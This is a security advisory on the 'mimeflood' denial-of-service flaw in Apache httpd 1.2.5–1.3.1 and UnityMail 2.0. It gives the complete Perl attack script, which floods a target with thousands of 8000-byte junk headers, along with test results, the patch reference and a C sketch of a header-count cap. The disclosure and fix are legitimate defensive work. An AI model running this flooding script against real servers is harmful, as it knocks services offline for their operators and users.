COMMAND

    apache httpd

SYSTEMS AFFECTED

    Apache 1.2.5...1.3.1 (before?), UnityMail 2.0

PROBLEM

    Laurent FACQ found the following.  This is generally a variant of
    the Sioux DoS attack (described in httpd #36 in the 'mUNIXes'
    section), and if you have applied the patch posted by Ben Laurie,
    this 'mimeflood' script won't harm your server in any way.  The
    Perl script follows:

    #! /bin/perl

    # mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)

    # Web servers / possible DOS Attack / "mime header flooding"
    #
    #       looking at the apache 1.2.5 source code i found
    #       that there was no limit on how many mime headers could
    #       be included in a client request. The only limits
    #       are : 8192 byte for each header, 300 sec. on reading headers.
    #
    #       => by sending a crazy amount of 8000 bytes headers, it's possible
    #       to consume a lot of memory (and of course CPU). The point
    #       is that httpd daemons grow and STAY at this big size (or die
    #       if you send too much)
    #
    #       -> may be a limit on mime header number could be added.
    #
    #       -> may be other web server could be vulnerable to this problem.
    #
    #       - i tried on an apache 1.2.5 -> it works
    #
    ##################################################

    use Socket;

    # Usage : $0 host [port [max] ]
    $max= 0;
    if ($ARGV[2])
    {
	$max= $ARGV[2];
    }

    $proto = getprotobyname('tcp');
    socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
    $port = 80;
    if ($ARGV[1])
    {
	$port= $ARGV[1];
    }
    $host = $ARGV[0];
    $sin = sockaddr_in($port,inet_aton($host));

    connect(Socket_Handle,$sin);
    send Socket_Handle,"GET / HTTP/1.0\n",0;
    $val= ('z'x8000)."\n";
    $n= 1;
    $|= 1;
    while (Socket_Handle)
    {
	send Socket_Handle,"Stupidheader$n: ",0;
	send Socket_Handle,$val,0;
	$n++;
	if (!($n % 100))
	{
	    print "$n\n";
	}

	if ($max && ($n > $max))
	{
	    last;
	}
    }
    print "Done: $n\n";
    send Socket_Handle,"\n",0;

    while (<Socket_Handle>)
    {
	print $_;
    }

    After 2000 headers, 1.3.1 was consuming 93% and stayed there
    (other processes were consuming 7%).  The script dies after 2800
    and Apache goes back to 0.05%.  Couldn't crash it (tested on HP-UX
    10.20 / Apache 1.3.1).  On the other hand, against Apache 1.3.1 on
    FreeBSD 2.2.6 (DX2-66 16Mb), the script hung after 2500 headers
    with Apache using 30Mb.  Against Apache 1.3.1 on NT4 (workstation)
    SP3 (P200 64Mb), after 7500 headers, Apache was using 120Mb RAM
    and the box ground to a halt.  It didn't actually crash Apache on
    either box, but it severely reduced the usefulness of the systems,
    so running 1.3.1 may lead to DoS as well.

    UnityMail 2.0 for 95/NT *IS* vulnerable to the DoS.  CPU load
    goes to 100%; the system is usable, however all access to the
    UnityMail administrative web server is hung.

SOLUTION

    It will be corrected in the next releases of the vulnerable
    software (Apache 1.3.2).  Also, see the patch in httpd #36.
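
    The script's own comments suggest adding a limit on the number of
    MIME headers.  The sketch below is an added example (not Apache's
    code and not part of the original advisory) of a header reader with
    and without such a cap; scan_headers, build_request and the cap
    value passed in are hypothetical names and assumed values.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FIELD_SIZE 8192  /* per-header limit quoted in the advisory */

struct hdr_scan { int status; int fields; size_t stored; };

/* Scan the header lines that follow the request line in buf[0..len).
 * max_fields == 0 models the unbounded case (per-line check only);
 * max_fields > 0 rejects with 400 as soon as the count is exceeded. */
struct hdr_scan scan_headers(const char *buf, size_t len, int max_fields)
{
    struct hdr_scan r = { 200, 0, 0 };
    const char *end = buf + len;
    const char *p = memchr(buf, '\n', len);        /* skip request line */

    if (p == NULL) { r.status = 400; return r; }
    for (p++; p < end; ) {
        const char *nl = memchr(p, '\n', (size_t)(end - p));
        size_t n = (size_t)((nl ? nl : end) - p);
        if (n > 0 && p[n - 1] == '\r') n--;        /* tolerate CRLF */
        if (n == 0) break;                         /* blank line ends headers */
        if (n > MAX_FIELD_SIZE || (max_fields > 0 && r.fields >= max_fields)) {
            r.status = 400;                        /* stop before buffering it */
            return r;
        }
        r.fields++;
        r.stored += n;                             /* bytes a server would keep */
        if (nl == NULL) break;
        p = nl + 1;
    }
    return r;
}

/* Constructed sample input: nfields headers, each with a vlen-byte value. */
size_t build_request(char *out, size_t cap, int nfields, size_t vlen)
{
    size_t off = (size_t)snprintf(out, cap, "GET / HTTP/1.0\r\n");
    for (int i = 0; i < nfields; i++) {
        int k = snprintf(out + off, cap - off, "X-Pad-%d: ", i);
        if (k < 0 || off + (size_t)k + vlen + 4 >= cap) break;
        off += (size_t)k;
        memset(out + off, 'z', vlen);
        memcpy(out + off + vlen, "\r\n", 2);
        off += vlen + 2;
    }
    memcpy(out + off, "\r\n", 2);
    return off + 2;
}
```

    With a cap in place, the bytes held per request are bounded by the
    cap times MAX_FIELD_SIZE, whatever the client sends.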